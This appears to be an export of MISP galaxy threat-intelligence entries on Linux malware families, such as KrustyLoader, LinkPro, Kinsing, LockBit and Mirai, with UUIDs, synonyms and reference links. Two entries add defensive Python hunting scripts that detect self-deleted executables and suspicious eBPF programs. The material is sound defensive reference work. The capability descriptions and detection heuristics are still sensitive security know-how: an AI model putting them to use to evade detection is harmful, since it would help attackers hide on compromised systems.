- https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
kerberods
Internal MISP references
UUID e3787d95-2595-449e-8cf9-90845a9b7444 which can be used as unique global reference for kerberods in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.kerberods - webarchive
- https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916 - webarchive
- https://blog.talosintelligence.com/2019/09/watchbog-patching.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/ - webarchive
- https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang - webarchive
- https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KEYPLUG
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KEYPLUG.
| Known Synonyms |
|---|
| ELFSHELF |
Internal MISP references
UUID 2c4bfc14-3ea4-4ced-806a-fcac30b2a9d7 which can be used as unique global reference for KEYPLUG in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.keyplug - webarchive
- https://experience.mandiant.com/trending-evil/p/1 - webarchive
- https://www.mandiant.com/resources/mobileiron-log4shell-exploitation - webarchive
- https://hunt.io/blog/keyplug-infrastructure-tls-certificates-ghostwolf-activity - webarchive
- https://www.sentinelone.com/labs/sandman-apt-china-based-adversaries-embrace-lua/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf - webarchive
- https://www.mandiant.com/resources/apt41-us-state-governments - webarchive
- https://twitter.com/CyberJack42/status/1501290277864046595 - webarchive
- https://web.archive.org/web/20240523105313/https://yoroi.company/en/research/uncovering-an-undetected-keyplug-implant-attacking-industries-in-italy/ - webarchive
- https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
kfos
Internal MISP references
UUID 5e353bc2-4d32-409b-aeb6-c7df32607c56 which can be used as unique global reference for kfos in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Kinsing
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kinsing.
| Known Synonyms |
|---|
| h2miner |
Internal MISP references
UUID ef0e3a56-e614-4dc1-bb20-0dcf7215c1ea which can be used as unique global reference for Kinsing in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing - webarchive
- https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/ - webarchive
- https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts - webarchive
- https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775 - webarchive
- https://redcanary.com/blog/kinsing-malware-citrix-saltstack/ - webarchive
- https://twitter.com/IntezerLabs/status/1259818964848386048 - webarchive
- https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/ - webarchive
- https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039 - webarchive
- https://twitter.com/MsftSecIntel/status/1535417776290111489 - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.aquasec.com/blog/aqua-cndr-stop-dreambus-botnet-attack/ - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/ - webarchive
- https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability - webarchive
- https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html - webarchive
- https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/ - webarchive
- https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces - webarchive
- https://www.aquasec.com/blog/kinsing-malware-exploits-novel-openfire-vulnerability/ - webarchive
- https://unit42.paloaltonetworks.com/cve-2020-25213/ - webarchive
- https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability - webarchive
- https://1665891.fs1.hubspotusercontent-na1.net/hubfs/1665891/Threat%20reports/AquaSecurity_Kinsing_Demystified_Technical_Guide.pdf - webarchive
- https://www.aquasec.com/blog/loony-tunables-vulnerability-exploited-by-kinsing/ - webarchive
- https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html - webarchive
- https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743 - webarchive
- https://unit42.paloaltonetworks.com/atoms/moneylibra/ - webarchive
- https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
kitty-socks5
Internal MISP references
UUID 687213a8-2e55-4a89-add7-b79e6fd5e46a which can be used as unique global reference for kitty-socks5 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KIVARS (ELF)
Internal MISP references
UUID e8b24118-4ce8-471b-8683-1077a0f5f2a9 which can be used as unique global reference for KIVARS (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Kobalos
Internal MISP references
UUID 201d54ae-7fb0-4522-888c-758fa9019737 which can be used as unique global reference for Kobalos in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf - webarchive
- https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/ - webarchive
- https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Krasue RAT
Internal MISP references
UUID b111325d-dd90-47cc-8777-fcb7e610a76e which can be used as unique global reference for Krasue RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KrustyLoader
ELF x64 Rust downloader first discovered on Ivanti Connect Secure VPN appliances after the exploitation of CVE-2024-21887 and CVE-2023-46805. It downloads a Sliver backdoor and deletes itself.
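A loader that deletes its own file while still running is easy to spot on Linux: the kernel keeps the unlinked inode alive and reports the process's `/proc/<pid>/exe` link with a literal ` (deleted)` suffix. The following is an added hunting example, not code from the KrustyLoader sample or from any of the referenced write-ups. It walks procfs (by default the real `/proc`, which needs root to read other users' `exe` links) and, for the runnable demo, builds a constructed procfs tree whose symlink targets carry the suffix literally; the paths and PIDs in it are invented. The check only catches a process that is still alive, so a loader that has already handed off to its payload and exited has to be found from the payload process or from file-system and log evidence instead.

```python
import os
import tempfile

DELETED_SUFFIX = " (deleted)"


def classify_exe_link(pid, exe_target):
    """Classify the target of /proc/<pid>/exe as os.readlink reports it.
    The kernel appends " (deleted)" when the backing inode has been unlinked,
    which is exactly what a self-deleting loader leaves behind while running.
    Returns None when the executable still exists on disk."""
    if not exe_target.endswith(DELETED_SUFFIX):
        return None
    path = exe_target[: -len(DELETED_SUFFIX)]
    reason = (
        "memfd-backed executable"  # fileless: never had a path on a real filesystem
        if path.startswith("/memfd:")
        else "executable unlinked while running"
    )
    return {"pid": pid, "path": path, "reason": reason}


def find_deleted_executables(proc_root="/proc"):
    """Walk a procfs tree and collect processes whose executable is gone."""
    findings = []
    for entry in sorted(os.listdir(proc_root)):
        if not entry.isdigit():
            continue  # /proc/sys, /proc/net and friends are not processes
        try:
            target = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue  # kernel threads, zombies, or insufficient privilege
        hit = classify_exe_link(int(entry), target)
        if hit:
            findings.append(hit)
    return findings


def build_constructed_procfs(root):
    """Create a fake procfs layout with three processes (constructed data).
    Real procfs synthesises the " (deleted)" suffix; here it is written
    literally into dangling symlinks so the demo runs without root."""
    fake = {
        "1": "/usr/lib/systemd/systemd",            # healthy process
        "4242": "/tmp/.cache/loader (deleted)",      # hypothetical self-deleting loader
        "4300": "/memfd:payload (deleted)",          # hypothetical in-memory payload
    }
    for pid, target in fake.items():
        os.mkdir(os.path.join(root, pid))
        os.symlink(target, os.path.join(root, pid, "exe"))
    os.mkdir(os.path.join(root, "sys"))  # non-PID entry that must be skipped


def demo():
    """Run the scan against the constructed tree and return its findings."""
    with tempfile.TemporaryDirectory() as root:
        build_constructed_procfs(root)
        return find_deleted_executables(root)


if __name__ == "__main__":
    for hit in find_deleted_executables():  # the live system; run as root
        print(hit)
```

On a live host the same information is available from `ls -l /proc/*/exe` or `lsof +L1`; the value of scripting it is that the result can be correlated with the process's open sockets and parent chain in the same sweep.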
Internal MISP references
UUID 1a5d8c38-42fa-4405-83fc-4e07b4407205 which can be used as unique global reference for KrustyLoader in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.krustyloader - webarchive
- https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures - webarchive
- https://nofix.re/posts/2024-08-03-arti-rust/ - webarchive
- https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/ - webarchive
- https://www.synacktiv.com/publications/krustyloader-rust-malware-linked-to-ivanti-connectsecure-compromises - webarchive
- https://nofix.re/posts/2024-11-02-rust-symbs/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KTLVdoor (ELF)
According to Trend Micro, KTLVdoor is a highly obfuscated malware that masquerades as different system utilities, allowing attackers to carry out a variety of tasks including file manipulation, command execution, and remote port scanning.
Internal MISP references
UUID 3ee0b08d-b872-4eda-8f8f-6d2f37b053ae which can be used as unique global reference for KTLVdoor (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Kubo Injector
According to the author of this open source project, this is a library for injecting a shared library into a Linux, Windows or macOS process.
Internal MISP references
UUID ad8b5e47-338f-42ff-8aed-a455f697d5a7 which can be used as unique global reference for Kubo Injector in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Kuiper (ELF)
Internal MISP references
UUID 30ad3f49-bffd-4383-88b3-067ccfac7038 which can be used as unique global reference for Kuiper (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Lady
Internal MISP references
UUID f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d which can be used as unique global reference for Lady in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LeetHozer
Internal MISP references
UUID e9f2857a-cb91-4715-ac8b-fdc89bc9a03e which can be used as unique global reference for LeetHozer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Lightning Framework
Internal MISP references
UUID 927bc8fc-fef4-4331-877d-18bcd33bdf9c which can be used as unique global reference for Lightning Framework in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LiLock
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LiLock.
| Known Synonyms |
|---|
| Lilocked |
| Lilu |
Internal MISP references
UUID 1328ed0d-9c1c-418b-9a96-1c538e4893bc which can be used as unique global reference for LiLock in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilock - webarchive
- https://fossbytes.com/lilocked-ransomware-infected-linux-servers/ - webarchive
- https://id-ransomware.blogspot.com/2019/07/lilu-lilocked-ransomware.html - webarchive
- https://www.bleepingcomputer.com/news/security/lilocked-ransomware-actively-targeting-servers-and-web-sites/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
lilyofthevalley
Internal MISP references
UUID f789442f-8f50-4e55-8fbc-b93d22b5314e which can be used as unique global reference for lilyofthevalley in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LinkPro
According to Synacktiv, LinkPro targets GNU/Linux systems and is written in Go. It is named after its main module and the corresponding (private) GitHub repository. LinkPro uses eBPF both to activate only when a "magic packet" is received and to hide itself on the compromised system.
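An implant that uses eBPF for both a network trigger and for hiding has to load at least one program at a packet-processing hook and one at a tracing hook, and both stay visible to `bpftool prog show` even when the user-space loader is hidden. The following is an added triage example, not code from Synacktiv or from the LinkPro sample: it parses the JSON that `bpftool prog show -j` prints (only the `id`, `type`, `name` and `pids` fields; `pids` is populated on recent kernels where bpftool can use BPF iterators), flags programs whose loader is not on an allowlist or has no live loader at all, and raises the severity when one process holds both a network hook and a tracing hook. The sample output, the loader name `updater` and the program names are constructed for the example and are not LinkPro indicators.

```python
import json
import sys
from collections import defaultdict

# bpftool program type names that sit on the packet path (trigger candidates)
NETWORK_HOOKS = {"xdp", "sched_cls", "sched_act", "socket_filter", "sk_skb", "sk_msg", "cgroup_skb"}
# ... and those that can observe or alter syscalls (hiding candidates)
TRACING_HOOKS = {"kprobe", "tracepoint", "raw_tracepoint", "tracing", "perf_event", "lsm"}
# loaders you expect on the host; extend from your own baseline
KNOWN_LOADERS = frozenset({"systemd", "cilium-agent", "bpftrace", "falco"})

# Constructed bpftool output containing only the fields this example reads.
# Program 12 is what systemd's firewall sandboxing looks like; 57/58 model a
# hypothetical implant; 60 models a pinned program whose loader has exited.
SAMPLE_BPFTOOL_JSON = """
[
  {"id": 12, "type": "cgroup_skb", "name": "sd_fw_egress",
   "pids": [{"pid": 1, "comm": "systemd"}]},
  {"id": 57, "type": "xdp", "name": "ingress_watch",
   "pids": [{"pid": 4242, "comm": "updater"}]},
  {"id": 58, "type": "tracepoint", "name": "sys_enter",
   "pids": [{"pid": 4242, "comm": "updater"}]},
  {"id": 60, "type": "kprobe", "name": "", "pids": []}
]
"""


def triage_bpf_programs(bpftool_json, known_loaders=KNOWN_LOADERS):
    """Return a list of findings over `bpftool prog show -j` output."""
    findings = []
    types_by_loader = defaultdict(set)
    for prog in json.loads(bpftool_json):
        pids = prog.get("pids") or []
        if not pids:
            # pinned to bpffs or held by a map/link after the loader died
            findings.append({"id": prog["id"], "severity": "medium",
                             "reason": "no live loader process"})
            continue
        unknown = {p["comm"] for p in pids} - known_loaders
        if unknown:
            findings.append({"id": prog["id"], "severity": "medium",
                             "reason": f"loaded by unexpected process {sorted(unknown)}"})
        for p in pids:
            types_by_loader[p["pid"]].add(prog["type"])

    # the LinkPro-style combination: one process owns a trigger and a hider
    for pid, types in types_by_loader.items():
        if types & NETWORK_HOOKS and types & TRACING_HOOKS:
            findings.append({"pid": pid, "severity": "high",
                             "reason": "same process holds a network hook and a tracing hook"})
    return findings


if __name__ == "__main__":
    # usage: bpftool prog show -j | python3 triage_bpf.py
    for f in triage_bpf_programs(sys.stdin.read()):
        print(f)
```

Program names are attacker-controlled and the `pids` list only reflects processes that still hold a file descriptor, so a legitimate-looking name or an empty loader list is not evidence of anything by itself; the combination of an unexpected loader with both hook classes is what makes a finding worth pulling the program bytecode with `bpftool prog dump xlated id <id>`.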
Internal MISP references
UUID ae50535d-9f43-4131-9b2e-46c8fadcbda5 which can be used as unique global reference for LinkPro in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Linodas
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Linodas.
| Known Synonyms |
|---|
| DinodasRAT |
| XDealer |
Internal MISP references
UUID e47295eb-e907-410a-ab16-62ed8652d8bf which can be used as unique global reference for Linodas in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LiquorBot
BitDefender tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which seems to be actively in development and has recently incorporated Monero cryptocurrency mining features. Interestingly, LiquorBot is written in Go (also known as Golang), which offers some programming advantages over traditional C-style code, such as memory safety, garbage collection, structural typing, and even CSP-style concurrency.
Internal MISP references
UUID 3fe8f3db-4861-4e78-8b60-a794fe22ae3f which can be used as unique global reference for LiquorBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LittleDaemon
According to ESET Research, LittleDaemon is the first stage deployed on the victim’s machine through hijacked updates. It was observed in both DLL and executable versions, both of them 32-bit PEs. The main purpose of LittleDaemon is to communicate with the hijacking node to obtain the downloader that we call DaemonicLogistics. LittleDaemon does not establish persistence.
Internal MISP references
UUID cb4b6ab8-5f13-4635-b67b-6d49a545402d which can be used as unique global reference for LittleDaemon in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LockBit (ELF)
Internal MISP references
UUID afce6aba-d4c4-49fa-b9a9-1a70e92e5a0e which can be used as unique global reference for LockBit (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.lockbit - webarchive
- https://security.packt.com/understanding-lockbit/ - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79 - webarchive
- https://www.trendmicro.com/en_us/research/25/i/lockbit-5-targets-windows-linux-esxi.html - webarchive
- https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/ - webarchive
- https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/ - webarchive
- https://services.google.com/fh/files/misc/m-trends-2025-en.pdf - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://www.ic3.gov/Media/News/2022/220204.pdf - webarchive
- https://www.linkedin.com/pulse/intrusion-insights-straight-from-leaked-operator-chats-ahmad-abdillah-p1ejc?utm_source=share&utm_medium=member_ios&utm_campaign=share_via - webarchive
- https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants - webarchive
- https://analyst1.com/lockbit-takedown-operation-cronos-a-long-awaited-psyops-against-ransomware/ - webarchive
- https://securelist.com/crimeware-report-lockbit-switchsymb/110068/ - webarchive
- https://www.europol.europa.eu/media-press/newsroom/news/law-enforcement-disrupt-worlds-biggest-ransomware-operation - webarchive
- https://www.washingtonpost.com/business/2024/02/20/lockbit-ransomware-cronos-nca-fbi/ - webarchive
- https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://analyst1.com/ransomware-diaries-volume-3-lockbits-secrets/ - webarchive
- https://nationalcrimeagency.gov.uk/news/nca-leads-international-investigation-targeting-worlds-most-harmful-ransomware-group - webarchive
- https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/ - webarchive
- https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/ - webarchive
- https://blog.compass-security.com/2022/03/vpn-appliance-forensics/ - webarchive
- https://github.com/prodaft/malware-ioc/tree/master/PTI-257 - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html - webarchive
- https://analyst1.com/ransomware-diaries-volume-1/ - webarchive
- https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/ - webarchive
- https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Loerbas
Loader and Cleaner components used in attacks against high-performance computing centers in Europe.
Internal MISP references
UUID 6332d57c-c46f-4907-8dac-965b15ffbed6 which can be used as unique global reference for Loerbas in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Log Collector
Internal MISP references
UUID 0473214a-2daa-4b5b-84bc-1bcbab11ef80 which can be used as unique global reference for Log Collector in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Lootwodniw
Internal MISP references
UUID cfcf8608-03e7-4a5b-a46c-af342db2d540 which can be used as unique global reference for Lootwodniw in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Luna
ESXi-encrypting ransomware written in Rust.
Internal MISP references
UUID bc9022d6-ee65-463f-9823-bc0f96963a75 which can be used as unique global reference for Luna in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LZRD
According to Akamai, a Mirai variant exploiting GeoVision IoT devices (possibly via CVE-2024-6047 and/or CVE-2024-11120).
Internal MISP references
UUID d705d9cf-279d-40ef-8447-8d35604a2bed which can be used as unique global reference for LZRD in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Manjusaka (ELF)
Cisco Talos compared this RAT to Cobalt Strike and Sliver. Written in Rust.
Internal MISP references
UUID cd3a3a96-af66-4470-8115-b8bf3eef005a which can be used as unique global reference for Manjusaka (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MASOL
Internal MISP references
UUID ab541e72-13a1-4156-af0b-144e1ad5aeb3 which can be used as unique global reference for MASOL in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Masuta
Masuta is a variant of Mirai that targets IoT devices, primarily routers, using dictionary attacks against weak credentials. PureMasuta is a variant of Masuta that additionally targets a D-Link HNAP bug (EDB 38722).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Masuta.
| Known Synonyms |
|---|
| PureMasuta |
Internal MISP references
UUID b9168ff8-01df-4cd0-9f70-fe9e7a11eccd which can be used as unique global reference for Masuta in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.masuta - webarchive
- https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/ - webarchive
- https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7 - webarchive
- https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Matryosh
Internal MISP references
UUID 4e989704-c49f-468c-95e1-1b7c5a58b3c4 which can be used as unique global reference for Matryosh in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Melofee
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Melofee.
| Known Synonyms |
|---|
| Mélofée |
Internal MISP references
UUID 1ffd85bd-389c-4e04-88fd-8186423c3691 which can be used as unique global reference for Melofee in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.melofee - webarchive
- https://blog.exatrack.com/melofee/ - webarchive
- https://asec.ahnlab.com/en/55785/ - webarchive
- https://blog.xlab.qianxin.com/analysis_of_new_melofee_variant_en/ - webarchive
- https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MESSAGETAP
MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. It is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft.
Internal MISP references
UUID a07d6748-3557-41ac-b55b-f4348dc2a3c7 which can be used as unique global reference for MESSAGETAP in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.messagetap - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Midrashim
An x64 ELF file infector with a non-destructive payload.
Internal MISP references
UUID fe220358-7118-4feb-b43e-cbdaf2ea09dc which can be used as unique global reference for Midrashim in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MiKey
Internal MISP references
UUID aae3b83d-a116-4ebc-aae0-f6327ef174ea which can be used as unique global reference for MiKey in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Mirai (ELF)
Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mirai (ELF).
| Known Synonyms |
|---|
| Katana |
Internal MISP references
UUID 17e12216-a303-4a00-8283-d3fe92d0934c which can be used as unique global reference for Mirai (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai - webarchive
- https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants - webarchive
- https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/ - webarchive
- https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/ - webarchive
- http://osint.bambenekconsulting.com/feeds/ - webarchive
- https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/ - webarchive
- https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/ - webarchive
- https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts - webarchive
- https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/ - webarchive
- https://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html - webarchive
- https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt - webarchive
- https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093 - webarchive
- https://community.riskiq.com/article/d8a78daf - webarchive
- https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039 - webarchive
- https://twitter.com/MsftSecIntel/status/1535417776290111489 - webarchive
- https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/ - webarchive
- https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf - webarchive
- https://www.cisecurity.org/insights/blog/top-10-malware-march-2022 - webarchive
- https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html - webarchive
- https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/ - webarchive
- https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/ - webarchive
- https://www.youtube.com/watch?v=KVJyYTie-Dc - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/ - webarchive
- https://blog.xlab.qianxin.com/mirai-nomi-en/ - webarchive
- https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/ - webarchive
- https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx - webarchive
- https://deform.co/the-infamous-mirai-trojan-evolves-new-pandora-variant-targets-android-tvs/ - webarchive
- https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/ - webarchive
- https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html - webarchive
